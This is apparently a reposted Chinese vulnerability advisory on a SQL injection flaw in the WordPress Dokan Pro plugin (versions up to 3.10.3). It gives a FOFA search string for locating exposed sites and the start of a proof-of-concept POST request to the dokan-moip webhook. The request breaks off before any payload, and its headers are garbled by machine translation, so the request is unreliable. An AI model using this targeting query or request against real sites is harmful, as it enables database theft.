0x01 产品简介
WordPress Dokan Pro 插件是一个强大的多供应商电子商务市场解决方案,是一个全面且易于使用的多供应商电子商务平台解决方案,适合任何规模的电子商务项目。管理员可以创建一个多卖家平台,卖家可以注册账户并在平台上创建自己的商店来展示和销售自己的产品。通过提供直观的用户界面,商家可以轻松管理他们的商店,包括添加产品、履行订单以及与客户沟通。
0x02 漏洞概述
WordPress Dokan Pro 插件版本3.10.3 及更低版本中的现有SQL 查询中缺乏对用户指定的“subscription_code”参数的正确转义和漏洞。非特权攻击者可以利用此漏洞将额外的SQL 语句注入现有查询并从数据库中提取敏感信息。
0x03 影响范围
Dokan Pro=版本3.10.3
0x04 复现环境
FOFA: \’/wp-content/plugins/dokan-pro/\’
0x05 漏洞复现
示范实验
POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host:你的IP
用户代理: Mozilla/5.0(Windows NT 5.1;rv:21.0)Gecko/20100101 Firefox/21.0
关闭连接:
接受编码: gzip
{\’env\’:\’1\’,\’事件
上述#WordPress Dokan Pro插件再次出现SQL注入漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92611.html